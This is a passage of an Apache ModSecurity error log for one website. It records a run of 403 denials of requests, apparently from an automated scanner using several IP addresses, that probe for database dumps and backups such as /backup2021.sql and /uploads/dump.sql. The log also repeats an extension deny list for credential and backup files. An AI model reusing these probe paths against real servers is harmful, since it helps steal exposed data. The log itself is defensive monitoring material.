"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/onperu-2022.sql"] [unique_id "ZoqxPPcO2IzqYGkif72oXwAAABU"] [Sun Jul 07 10:16:12.453286 2024] [:error] [pid 31926:tid 139722483472128] [client 185.129.61.129:33282] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-igacionperu.sql"] [unique_id "ZoqxPHug2jzbr_AlO3dxvwAAANY"] [Sun Jul 07 10:16:13.007467 2024] [:error] [pid 30826:tid 139722668111616] [client 185.129.61.129:33284] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_u.sql"] [unique_id "ZoqxPfcO2IzqYGkif72oYAAAAAA"] [Sun Jul 07 10:16:13.467499 2024] [:error] [pid 31926:tid 139722517042944] [client 185.129.61.129:33286] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dbase.sql"] [unique_id "ZoqxPXug2jzbr_AlO3dxwAAAANI"] [Sun Jul 07 10:16:14.214381 2024] [:error] [pid 30828:tid 139722609362688] [client 185.129.61.129:33288] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup2021.sql"] [unique_id "ZoqxPjbJWLg2ecbngu9H2wAAAIc"] [Sun Jul 07 10:16:15.448587 2024] [:error] [pid 30827:tid 139722475079424] [client 185.129.61.129:33290] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vb.sql"] [unique_id "ZoqxP0GuaLybMBNkB61tVQAAAFc"] [Sun Jul 07 10:16:16.155892 2024] [:error] [pid 30826:tid 139722659718912] [client 185.129.61.129:33292] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/1.sql"] [unique_id "ZoqxQPcO2IzqYGkif72oYQAAAAE"] [Sun Jul 07 10:16:19.317247 2024] [:error] [pid 30827:tid 139722508650240] [client 185.129.61.129:33294] [client 185.129.61.129] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_vestigacionperu.sql"] [unique_id "ZoqxQ0GuaLybMBNkB61tVgAAAFM"] [Sun Jul 07 10:16:20.624272 2024] [:error] [pid 30827:tid 139722525435648] [client 23.154.177.19:33296] [client 23.154.177.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/eru-2023.sql"] [unique_id "ZoqxREGuaLybMBNkB61tVwAAAFE"] [Sun Jul 07 10:16:21.731351 2024] [:error] [pid 30827:tid 139722668111616] [client 23.154.177.19:33298] [client 23.154.177.19] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-ionperu.sql"] [unique_id "ZoqxRUGuaLybMBNkB61tWAAAAEA"] [Sun Jul 07 10:16:22.991244 2024] [:error] [pid 30827:tid 139722483472128] [client 109.70.100.66:33300] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/user.sql"] [unique_id "ZoqxRkGuaLybMBNkB61tWQAAAFY"] [Sun Jul 07 10:16:23.851965 2024] [:error] [pid 30827:tid 139722542221056] [client 109.70.100.66:33302] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/acionperu-2022.sql"] [unique_id "ZoqxR0GuaLybMBNkB61tWgAAAE8"] [Sun Jul 07 10:16:24.858051 2024] [:error] [pid 30827:tid 139722584184576] [client 109.70.100.66:33304] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/schema.sql"] [unique_id "ZoqxSEGuaLybMBNkB61tWwAAAEo"] [Sun Jul 07 10:16:26.503308 2024] [:error] [pid 30827:tid 139722659718912] [client 109.70.100.66:33306] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/.sql"] [unique_id "ZoqxSkGuaLybMBNkB61tXAAAAEE"] [Sun Jul 07 10:16:27.321976 2024] [:error] [pid 30827:tid 139722651326208] [client 109.70.100.66:33308] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_sample.sql"] [unique_id "ZoqxS0GuaLybMBNkB61tXQAAAEI"] [Sun Jul 07 10:16:28.145196 2024] [:error] [pid 30826:tid 139722575791872] [client 109.70.100.66:33310] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-gacionperu.sql"] [unique_id "ZoqxTPcO2IzqYGkif72oYgAAAAs"] [Sun Jul 07 10:16:28.866013 2024] [:error] [pid 30828:tid 139722491864832] [client 109.70.100.66:33312] [client 109.70.100.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/uploads/dump.sql"] [unique_id "ZoqxTDbJWLg2ecbngu9H3AAAAJU"] [Sun Jul 07 10:16:31.039951 2024] [:error] [pid 30828:tid 139722559006464] [client 45.141.215.114:33314] [client 45.141.215.114] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_onperu.sql"] [unique_id "ZoqxTzbJWLg2ecbngu9H3QAAAI0"] [Sun Jul 07 10:16:31.970234 2024] [:error] [pid 31926:tid 139722575791872] [client 45.141.215.114:33318] [client 45.141.215.114] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/registry.sql"] [unique_id "ZoqxT3ug2jzbr_AlO3dxwQAAAMs"] [Sun Jul 07 10:16:43.289108 2024] [:error] [pid 30828:tid 139722483472128] [client 109.70.100.71:33354] [client 109.70.100.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/acionperu-2023.sql"] [unique_id "ZoqxWzbJWLg2ecbngu9H5QAAAJY"] [Sun Jul 07 10:16:45.125712 2024] [:error] [pid 30828:tid 139722642933504] [client 109.70.100.71:33356] [client 109.70.100.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-onperu.sql"] [unique_id "ZoqxXTbJWLg2ecbngu9H5gAAAIM"] [Sun Jul 07 10:16:45.985469 2024] [:error] [pid 30828:tid 139722466686720] [client 109.70.100.71:33358] [client 109.70.100.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/stigacionperu-2023.sql"] [unique_id "ZoqxXTbJWLg2ecbngu9H5wAAAJg"] [Sun Jul 07 10:16:46.750504 2024] [:error] [pid 30828:tid 139722575791872] [client 109.70.100.71:33360] [client 109.70.100.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_eru.sql"] [unique_id "ZoqxXjbJWLg2ecbngu9H6AAAAIs"] [Sun Jul 07 10:16:47.692238 2024] [:error] [pid 31926:tid 139722508650240] [client 109.70.100.71:33362] [client 109.70.100.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ 